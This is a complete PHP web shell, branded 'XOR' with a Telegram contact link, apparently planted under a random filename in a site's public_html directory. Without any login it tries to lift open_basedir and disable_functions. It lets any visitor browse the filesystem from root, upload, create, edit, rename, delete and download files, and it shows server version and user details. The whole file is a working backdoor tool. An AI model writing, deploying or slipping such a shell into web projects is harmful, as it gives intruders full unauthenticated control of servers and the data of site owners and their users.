File: /home/bestafjg/public_html/ovanzeibk.php
<?php
/**
*/
@error_reporting(0);
@ini_set('display_errors', 0);
// Set headers to ensure proper rendering
header('Content-Type: text/html; charset=utf-8');
if(function_exists('ini_set')) {
@ini_set('open_basedir', NULL);
@ini_set('disable_functions', '');
}
// Helper Functions
function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; }
function readFileContent($file) { return @file_get_contents($file) ?: ''; }
function scanDirectory($dir) { return @scandir($dir) ?: array(); }
// Path Logic
$currentPath = isset($_GET['p']) ? $_GET['p'] : (@getcwd() ?: '.');
$currentPath = rtrim(str_replace(array('\\','//'), '/', $currentPath), '/') . '/';
if(!@is_dir($currentPath)) $currentPath = './';
$message = '';
// POST Actions
if($_SERVER['REQUEST_METHOD'] === 'POST') {
if(isset($_FILES['upload'])) {
$destination = $currentPath . basename($_FILES['upload']['name']);
$message = @move_uploaded_file($_FILES['upload']['tmp_name'], $destination) ||
writeFile($destination, readFileContent($_FILES['upload']['tmp_name']))
? '<span class="status-success">✓ Uploaded successfully</span>'
: '<span class="status-error">✗ Upload failed</span>';
}
if(isset($_POST['new'])) {
$path = $currentPath . $_POST['new'];
if(isset($_POST['type']) && $_POST['type'] === 'dir') {
$message = @mkdir($path) ? '<span class="status-success">✓ Folder created</span>' : '<span class="status-error">✗ Failed to create folder</span>';
} else {
$message = writeFile($path, isset($_POST['content']) ? $_POST['content'] : '') ? '<span class="status-success">✓ File created</span>' : '<span class="status-error">✗ Failed to create file</span>';
}
}
if(isset($_POST['save']) && isset($_POST['data'])) {
$message = writeFile($currentPath . $_POST['save'], $_POST['data']) ? '<span class="status-success">✓ Saved</span>' : '<span class="status-error">✗ Save failed</span>';
}
if(isset($_POST['oldname']) && isset($_POST['newname'])) {
$message = @rename($currentPath . $_POST['oldname'], $currentPath . $_POST['newname']) ? '<span class="status-success">✓ Renamed</span>' : '<span class="status-error">✗ Rename failed</span>';
}
}
// GET Actions
if(isset($_GET['action'])) {
$item = isset($_GET['item']) ? $_GET['item'] : '';
$itemPath = $currentPath . $item;
if($_GET['action'] === 'delete') {
if(@is_file($itemPath)) { $message = @unlink($itemPath) ? '<span class="status-success">✓ Deleted</span>' : '<span class="status-error">✗ Delete failed</span>'; }
elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? '<span class="status-success">✓ Deleted</span>' : '<span class="status-error">✗ Delete failed</span>'; }
} elseif($_GET['action'] === 'download' && @is_file($itemPath)) {
@ob_clean();
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($itemPath).'"');
@readfile($itemPath);
exit;
}
}
$items = array_diff(scanDirectory($currentPath), array('.', '..'));
$folders = array(); $files = array();
foreach($items as $item) { @is_dir($currentPath.$item) ? $folders[] = $item : $files[] = $item; }
sort($folders); sort($files);
$systemInfo = array(
'PHP' => @phpversion(),
'OS' => @php_uname('s'),
'USER' => @get_current_user()
);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>XOR |</title>
<style>
:root {
--bg: #0d1117;
--surface: #161b22;
--accent: #58a6ff;
--accent-glow: rgba(88, 166, 255, 0.2);
--text: #c9d1d9;
--text-dim: #8b949e;
--success: #3fb950;
--danger: #f85149;
--tg-blue: #0088cc;
}
* { margin:0; padding:0; box-sizing:border-box; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif; }
body { background-color: var(--bg); color: var(--text); padding: 20px; line-height: 1.5; }
.wrapper { max-width: 1200px; margin: 0 auto; border: 1px solid #30363d; border-radius: 6px; overflow: hidden; background-color: var(--surface); }
header { padding: 24px; border-bottom: 1px solid #30363d; display: flex; justify-content: space-between; align-items: center; background-color: #0d1117; }
h1 { color: var(--accent); font-size: 20px; font-weight: 600; letter-spacing: 1px; }
.tg-link { display: flex; align-items: center; gap: 8px; color: #fff; background-color: var(--tg-blue); padding: 8px 16px; border-radius: 20px; text-decoration: none; font-size: 13px; font-weight: 500; transition: filter 0.2s; }
.tg-link:hover { filter: brightness(1.1); }
.tg-link svg { width: 18px; height: 18px; fill: white; }
.sys-info { margin-top: 8px; display: flex; gap: 16px; font-size: 12px; color: var(--text-dim); }
.sys-info b { color: var(--text); }
.breadcrumb { padding: 12px 24px; background-color: #161b22; font-size: 13px; border-bottom: 1px solid #30363d; }
.breadcrumb a { color: var(--accent); text-decoration: none; }
.breadcrumb span { color: var(--text-dim); margin: 0 4px; }
.toolbar { padding: 16px 24px; display: flex; gap: 10px; background-color: #0d1117; }
.btn { padding: 6px 12px; border-radius: 6px; border: 1px solid #30363d; background-color: #21262d; color: #c9d1d9; cursor: pointer; font-size: 13px; text-decoration: none; display: inline-flex; align-items: center; transition: 0.2s; }
.btn:hover { background-color: #30363d; border-color: #8b949e; }
.btn-neon { background-color: #238636; border-color: rgba(240,246,252,0.1); color: #fff; }
.btn-neon:hover { background-color: #2ea043; }
.file-list { width: 100%; border-collapse: collapse; }
.file-list th { text-align: left; padding: 12px 24px; font-size: 12px; font-weight: 600; color: var(--text-dim); border-bottom: 1px solid #30363d; }
.file-list td { padding: 12px 24px; border-bottom: 1px solid #21262d; font-size: 14px; }
.file-list tr:hover { background-color: rgba(177, 186, 196, 0.05); }
.folder-link { color: var(--accent); text-decoration: none; font-weight: 500; }
.file-link { color: var(--text); text-decoration: none; }
.actions { display: flex; gap: 12px; }
.actions a, .actions button { background: none; border: none; color: var(--accent); cursor: pointer; font-size: 13px; text-decoration: none; }
.actions a:hover { text-decoration: underline; }
.actions .del { color: var(--danger); }
.editor-wrap { padding: 24px; background-color: #0d1117; }
textarea { width: 100%; height: 500px; background-color: #0d1117; color: #e6edf3; border: 1px solid #30363d; border-radius: 6px; padding: 16px; font-family: ui-monospace, SFMono-Regular, "SF Mono", Menlo, Consolas, "Liberation Mono", monospace; font-size: 14px; outline: none; }
.status-success { color: var(--success); }
.status-error { color: var(--danger); }
</style>
</head>
<body>
<div class="wrapper">
<header>
<div>
<h1>XOR <span style="font-weight:300; opacity:0.6;"></span></h1>
<div class="sys-info">
<?php foreach($systemInfo as $k => $v): ?>
<span><?php echo $k; ?>: <b><?php echo $v; ?></b></span>
<?php endforeach; ?>
</div>
</div>
<a href="https://t.me/XOR48" target="_blank" class="tg-link">
<svg viewBox="0 0 24 24"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm4.64 6.8c-.15 1.58-.8 5.42-1.13 7.19-.14.75-.42 1-.68 1.03-.58.05-1.02-.38-1.58-.75-.88-.58-1.38-.94-2.23-1.5-.99-.65-.35-1.01.22-1.59.15-.15 2.71-2.48 2.76-2.69.01-.03.01-.14-.07-.2-.08-.06-.19-.04-.27-.02-.12.02-1.96 1.24-5.54 3.65-.52.36-.99.53-1.41.52-.46-.01-1.35-.26-2.01-.48-.81-.27-1.45-.42-1.39-.89.03-.24.36-.49.99-.74 3.86-1.68 6.43-2.78 7.72-3.31 3.67-1.53 4.44-1.8 4.94-1.81.11 0 .35.03.5.16.13.1.17.24.18.34z"/></svg>
TELEGRAM
</a>
</header>
<?php if($message): ?><div style="padding: 12px 24px; font-size: 13px; border-bottom: 1px solid #30363d; background-color: #161b22;"><?php echo $message; ?></div><?php endif; ?>
<div class="breadcrumb">
<a href="?p=/">root</a>
<?php
$parts = explode('/', trim($currentPath, '/'));
$tempP = '';
foreach($parts as $p): if(!$p) continue; $tempP .= '/'.$p; ?>
<span>/</span><a href="?p=<?php echo urlencode($tempP); ?>/"><?php echo $p; ?></a>
<?php endforeach; ?>
</div>
<div class="toolbar">
<form method="post" enctype="multipart/form-data" id="upf">
<input type="file" name="upload" id="upinput" style="display:none" onchange="document.getElementById('upf').submit()">
<button type="button" class="btn btn-neon" onclick="document.getElementById('upinput').click()">Upload File</button>
</form>
<button class="btn" onclick="newFile()">New File</button>
<button class="btn" onclick="newFolder()">New Folder</button>
<a href="?p=<?php echo urlencode($currentPath); ?>" class="btn">Refresh</a>
</div>
<?php if(isset($_GET['edit'])): ?>
<div class="editor-wrap">
<h4 style="margin-bottom:12px; font-size:14px; color:var(--text)">Editing: <?php echo htmlspecialchars($_GET['edit']); ?></h4>
<form method="post">
<input type="hidden" name="save" value="<?php echo htmlspecialchars($_GET['edit']); ?>">
<textarea name="data"><?php echo htmlspecialchars(readFileContent($currentPath.$_GET['edit'])); ?></textarea>
<div style="margin-top:16px; display:flex; gap:12px;">
<button class="btn btn-neon">Save Changes</button>
<a href="?p=<?php echo urlencode($currentPath); ?>" class="btn">Cancel</a>
</div>
</form>
</div>
<?php else: ?>
<table class="file-list">
<thead>
<tr>
<th width="50%">Name</th>
<th>Perms</th>
<th>Size</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php if($currentPath !== '/'): ?>
<tr><td colspan="4"><a href="?p=<?php echo urlencode(dirname($currentPath)); ?>/" class="folder-link">..</a></td></tr>
<?php endif; ?>
<?php foreach($folders as $f): $perm = substr(sprintf('%o', @fileperms($currentPath.$f)), -3); ?>
<tr>
<td><a href="?p=<?php echo urlencode($currentPath.$f); ?>/" class="folder-link">📁 <?php echo htmlspecialchars($f); ?></a></td>
<td><?php echo $perm; ?></td>
<td>DIR</td>
<td class="actions">
<button onclick="renameItem('<?php echo htmlspecialchars($f); ?>')">Rename</button>
<a href="?p=<?php echo urlencode($currentPath); ?>&action=delete&item=<?php echo urlencode($f); ?>" class="del" onclick="return confirm('Delete folder?')">Delete</a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach($files as $file):
$fpath = $currentPath.$file; $size = @filesize($fpath);
$perm = substr(sprintf('%o', @fileperms($fpath)), -3);
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
$isEdit = in_array($ext, array('php','txt','html','css','js','json','sql','sh'));
?>
<tr>
<td>
<a href="<?php echo $isEdit ? '?p='.urlencode($currentPath).'&edit='.urlencode($file) : '?p='.urlencode($currentPath).'&action=download&item='.urlencode($file); ?>" class="file-link">
📄 <?php echo htmlspecialchars($file); ?>
</a>
</td>
<td><?php echo $perm; ?></td>
<td><?php echo round($size/1024, 2); ?> KB</td>
<td class="actions">
<?php if($isEdit): ?><a href="?p=<?php echo urlencode($currentPath); ?>&edit=<?php echo urlencode($file); ?>">Edit</a><?php endif; ?>
<a href="?p=<?php echo urlencode($currentPath); ?>&action=download&item=<?php echo urlencode($file); ?>">Download</a>
<button onclick="renameItem('<?php echo htmlspecialchars($file); ?>')">Rename</button>
<a href="?p=<?php echo urlencode($currentPath); ?>&action=delete&item=<?php echo urlencode($file); ?>" class="del" onclick="return confirm('Delete file?')">Delete</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
<script>
function newFile() {
let n = prompt("File name:", "index.php");
if(n) {
let f = document.createElement('form'); f.method='post';
f.innerHTML = `<input type="hidden" name="new" value="${n}"><input type="hidden" name="content" value="">`;
document.body.appendChild(f); f.submit();
}
}
function newFolder() {
let n = prompt("Folder name:", "assets");
if(n) {
let f = document.createElement('form'); f.method='post';
f.innerHTML = `<input type="hidden" name="new" value="${n}"><input type="hidden" name="type" value="dir">`;
document.body.appendChild(f); f.submit();
}
}
function renameItem(old) {
let n = prompt("New name:", old);
if(n && n !== old) {
let f = document.createElement('form'); f.method='post';
f.innerHTML = `<input type="hidden" name="oldname" value="${old}"><input type="hidden" name="newname" value="${n}">`;
document.body.appendChild(f); f.submit();
}
}
</script>
</body>
</html>